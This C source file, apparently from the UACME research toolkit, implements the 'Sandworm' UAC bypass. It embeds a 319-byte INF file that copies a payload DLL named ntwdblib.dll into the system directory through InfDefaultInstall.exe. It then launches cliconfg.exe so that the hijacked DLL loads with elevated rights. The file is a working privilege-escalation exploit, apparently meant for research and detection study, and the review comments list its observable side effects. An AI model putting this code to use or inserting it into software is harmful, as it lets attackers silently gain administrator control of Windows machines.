UACME/Source/Akagi/methods/sandworm.c


/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017
*
* TITLE: SANDWORM.C
*
* VERSION: 2.70
*
* DATE: 25 Mar 2017
*
* Sandworm method.
*
* Used as part of exploit which is linked with rumored "russian hackers".
* - <EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD>-<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>?
* - Yes I can!
*
* Originally it was on the list to include in the first UACMe releases but was considered
* way too out-of-date and unavailable on anything other than Windows 7 + Windows 8.
* However since the Vault7 release this method again popped up in mind, thanks to CIA.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
/*
g_SandwormInf
; 61883.INF
; Copyright (c) Microsoft Corporation. All rights reserved.
[Version]
Signature="$CHICAGO$"
Class=61883
ClassGuid={7EBEFBC0-3200-11D2-B4C2-00A0C9697D07}
Provider=%Msft%
DriverVer=16/21/2006,6.1.7600.16385
[DestinationDirs]
DefaultDestDir = 11
[DefaultInstall]
CopyFiles=@ntwdblib.dll
*/
//
// Raw bytes of the INF text quoted in the comment above: CRLF line endings and
// no trailing NUL. 19 rows of 16 bytes plus a final row of 15 bytes = 319 bytes;
// ucmSandwormMethod writes the whole array using sizeof(g_SandwormInf).
//
static const unsigned char g_SandwormInf[319] = {
    0x3B, 0x20, 0x36, 0x31, 0x38, 0x38, 0x33, 0x2E, 0x49, 0x4E, 0x46, 0x0D, 0x0A, 0x3B, 0x20, 0x43,
    0x6F, 0x70, 0x79, 0x72, 0x69, 0x67, 0x68, 0x74, 0x20, 0x28, 0x63, 0x29, 0x20, 0x4D, 0x69, 0x63,
    0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x43, 0x6F, 0x72, 0x70, 0x6F, 0x72, 0x61, 0x74, 0x69,
    0x6F, 0x6E, 0x2E, 0x20, 0x20, 0x41, 0x6C, 0x6C, 0x20, 0x72, 0x69, 0x67, 0x68, 0x74, 0x73, 0x20,
    0x72, 0x65, 0x73, 0x65, 0x72, 0x76, 0x65, 0x64, 0x2E, 0x0D, 0x0A, 0x0D, 0x0A, 0x5B, 0x56, 0x65,
    0x72, 0x73, 0x69, 0x6F, 0x6E, 0x5D, 0x0D, 0x0A, 0x53, 0x69, 0x67, 0x6E, 0x61, 0x74, 0x75, 0x72,
    0x65, 0x3D, 0x22, 0x24, 0x43, 0x48, 0x49, 0x43, 0x41, 0x47, 0x4F, 0x24, 0x22, 0x0D, 0x0A, 0x43,
    0x6C, 0x61, 0x73, 0x73, 0x3D, 0x36, 0x31, 0x38, 0x38, 0x33, 0x0D, 0x0A, 0x43, 0x6C, 0x61, 0x73,
    0x73, 0x47, 0x75, 0x69, 0x64, 0x3D, 0x7B, 0x37, 0x45, 0x42, 0x45, 0x46, 0x42, 0x43, 0x30, 0x2D,
    0x33, 0x32, 0x30, 0x30, 0x2D, 0x31, 0x31, 0x44, 0x32, 0x2D, 0x42, 0x34, 0x43, 0x32, 0x2D, 0x30,
    0x30, 0x41, 0x30, 0x43, 0x39, 0x36, 0x39, 0x37, 0x44, 0x30, 0x37, 0x7D, 0x0D, 0x0A, 0x50, 0x72,
    0x6F, 0x76, 0x69, 0x64, 0x65, 0x72, 0x3D, 0x25, 0x4D, 0x73, 0x66, 0x74, 0x25, 0x0D, 0x0A, 0x44,
    0x72, 0x69, 0x76, 0x65, 0x72, 0x56, 0x65, 0x72, 0x3D, 0x31, 0x36, 0x2F, 0x32, 0x31, 0x2F, 0x32,
    0x30, 0x30, 0x36, 0x2C, 0x36, 0x2E, 0x31, 0x2E, 0x37, 0x36, 0x30, 0x30, 0x2E, 0x31, 0x36, 0x33,
    0x38, 0x35, 0x0D, 0x0A, 0x0D, 0x0A, 0x5B, 0x44, 0x65, 0x73, 0x74, 0x69, 0x6E, 0x61, 0x74, 0x69,
    0x6F, 0x6E, 0x44, 0x69, 0x72, 0x73, 0x5D, 0x0D, 0x0A, 0x44, 0x65, 0x66, 0x61, 0x75, 0x6C, 0x74,
    0x44, 0x65, 0x73, 0x74, 0x44, 0x69, 0x72, 0x20, 0x3D, 0x20, 0x31, 0x31, 0x0D, 0x0A, 0x0D, 0x0A,
    0x5B, 0x44, 0x65, 0x66, 0x61, 0x75, 0x6C, 0x74, 0x49, 0x6E, 0x73, 0x74, 0x61, 0x6C, 0x6C, 0x5D,
    0x0D, 0x0A, 0x43, 0x6F, 0x70, 0x79, 0x46, 0x69, 0x6C, 0x65, 0x73, 0x3D, 0x40, 0x6E, 0x74, 0x77,
    0x64, 0x62, 0x6C, 0x69, 0x62, 0x2E, 0x64, 0x6C, 0x6C, 0x0D, 0x0A, 0x0D, 0x0A, 0x0D, 0x0A
};
/*
* ucmSandwormMethod
*
* Purpose:
*
* Bypass UAC by using the whitelisted InfDefaultInstall executable.
* Originally Sandworm used InfDefaultInstall to write to HKLM.
* We will use it for a dll hijack.
* The target application in our case will be cliconfg.exe.
*
*/
/*
* Parameters:
*   ProxyDll     - buffer that is written to disk under the NTWDBLIB_DLL name
*   ProxyDllSize - size of that buffer in bytes
*
* Return:
*   The result of the final supRunProcess() call (the CLICONFG_EXE launch);
*   FALSE if any earlier step failed.
*
* Observable side effects (useful for detection): two files are created under
* g_ctx.szTempDirectory, INFDEFAULTINSTALL_EXE and then CLICONFG_EXE are launched
* from g_ctx.szSystemDirectory, and both files are deleted on a best-effort basis.
*/
BOOL ucmSandwormMethod(
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize
)
{
    BOOL bResult = FALSE;
    WCHAR szPayloadDll[MAX_PATH * 2];
    WCHAR szInstallInf[MAX_PATH * 2];
    WCHAR szProcessBuf[MAX_PATH * 2];

    // Zeroed up front so the cleanup at the end can test the first character to
    // tell whether a path was ever built. szProcessBuf is zeroed before each use.
    RtlSecureZeroMemory(szPayloadDll, sizeof(szPayloadDll));
    RtlSecureZeroMemory(szInstallInf, sizeof(szInstallInf));

    //
    // Write proxy dll to the disk.
    //
    // NOTE(review): _strcpy/_strcat are project helpers that take no length;
    // the code relies on each directory + file name fitting in MAX_PATH * 2 WCHARs.
    //
    _strcpy(szPayloadDll, g_ctx.szTempDirectory);
    _strcat(szPayloadDll, NTWDBLIB_DLL);
    if (supWriteBufferToFile(szPayloadDll, ProxyDll, ProxyDllSize)) {

        //
        // Write installation inf to the disk.
        // g_SandwormInf is the raw INF text; sizeof() gives its full length.
        //
        _strcpy(szInstallInf, g_ctx.szTempDirectory);
        _strcat(szInstallInf, PACKAGE_INF);
        if (supWriteBufferToFile(szInstallInf, (PVOID)g_SandwormInf, sizeof(g_SandwormInf))) {

            //
            // Run infdefaultinstall.exe to copy our payload dll.
            // The inf path is handed to supRunProcess as its second argument
            // (presumably the command line - confirm against supRunProcess).
            // &szProcessBuf has the same address as szProcessBuf, so this call is
            // equivalent to the two RtlSecureZeroMemory calls at the top.
            //
            RtlSecureZeroMemory(&szProcessBuf, sizeof(szProcessBuf));
            _strcpy(szProcessBuf, g_ctx.szSystemDirectory);
            _strcat(szProcessBuf, INFDEFAULTINSTALL_EXE);
            if (supRunProcess(szProcessBuf, szInstallInf)) {

                //
                // Run target executable. Its launch result becomes the method's
                // return value.
                //
                RtlSecureZeroMemory(&szProcessBuf, sizeof(szProcessBuf));
                _strcpy(szProcessBuf, g_ctx.szSystemDirectory);
                _strcat(szProcessBuf, CLICONFG_EXE);
                bResult = supRunProcess(szProcessBuf, NULL);
            }
        }
    }

    //
    // Best-effort cleanup: DeleteFile return values are ignored, so either file
    // may remain on disk if deletion fails. szInstallInf is non-empty only when
    // the payload dll write succeeded; szPayloadDll is always populated by this
    // point, so its deletion is always attempted.
    //
    if (szInstallInf[0] != 0) {
        DeleteFile(szInstallInf);
    }
    if (szPayloadDll[0] != 0) {
        DeleteFile(szPayloadDll);
    }
    return bResult;
}